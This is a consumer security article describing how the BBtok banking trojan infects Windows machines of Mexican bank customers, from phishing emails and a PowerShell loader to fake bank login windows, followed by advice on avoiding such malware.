Banking trojans are among the worst forms of malware. These viruses sit on your phone or computer and wait for the right moment to access your bank account. A ransomware virus may demand your money, but a banking trojan takes it.
The world of banking trojans grew recently with the addition of BBtok. This new malware strain appears to attack targets in Mexico exclusively. One thing that makes BBtok stand out is the fileless approach it takes. BBtok spreads through the use of malicious emails. Hackers write these emails to appear as if they come from legitimate sources. The emails contain an Lnk file that starts a PowerShell script when activated. By taking advantage of social engineering and human curiosity, hackers use the emails to convince victims to open these files and infect themselves.
The virus goes through some setup stages before completing the infection and delivering the main component of BBtok. The first stage happens when the PowerShell script is activated. The script downloads and executes a .Net loader payload. The loader activates the persistence mechanism built into the threat to make devices run it at startup. BBtok achieves persistence by altering the winmm.dll file in the Windows directory.
The loader module also launches countermeasures against antivirus programs on 64-bit machines. BBtok exploits the open-source Kernel Driver Utility (KDU) to attempt to delete registry entries for common antivirus software programs. The virus accesses arbitrary kernel memory to make these changes by leveraging vulnerable drivers on the system.
The BBtok trojan is finally deployed when all of these setup measures are completed. Once on the device, BBtok establishes a backdoor module that allows hackers to perform several malicious operations on the device. Attackers command the malware to perform various tasks, including simulating using the mouse and keyboard, manipulating program windows, listing processes, eliminating chosen ones, changing the clipboard contents, disable Windows Desktop Manager, and more.
Cybercriminals use these tools to achieve their real goal, collecting banking information on the target. They use fake bank security windows created by BBtok to trick victims into giving their info. The window requests users enter their banking information again. If the victim falls for the trick, the information they put in the window is harvested and delivered to the command and control server (C2) operated by the hacker. What they do with your data from there is anyone’s guess.
Some hackers take money directly. They infect your computer for personal gain. Others take a more indirect approach. Information is a valuable resource on the dark web, especially financial information. Rather than steal your money themselves, some choose to sell it at a price to interested parties. Either way, you lose your money, and people who shouldn’t have access to your bank account have it. There are many such financial “marketplaces” on the deep web. A banking trojan could be one phase of a plan to steal your identity, which has a far-reaching impact on your life. Identity theft is one of the worst things that can happen to a person.
BBtok is capable of impersonating several known Mexican banks. The virus targets AFIRME, ScotiaBank, BanBajio, Santander, Banco Azteca, Inbursa, Multiva, Banorte, HSBC, BBVA, CitiBanamex, and more. Mexican residents, and those who have accounts in Mexico, are warned to be extra careful with their banking information.
Banking trojans like this can do a lot more than steal your money. They are a serious threat and should be treated as such. If you ever receive an email from an unknown source, do not download or open any attachments. If the email appears to come from a legitimate source, such as a shipping company or banking institution, read through the email carefully to spot mistakes. Small grammatical errors such as misspelled words or poor punctuation can mark a malicious email. Be sure to double-check any banking information security windows that appear on your computer. Take care when downloading apps and software for your phone or computer, as many banking trojans appear to be harmless apps. Even official app stores like Google Play and the Apple App Store have viruses swimming around them. You can never be too careful with your personal information.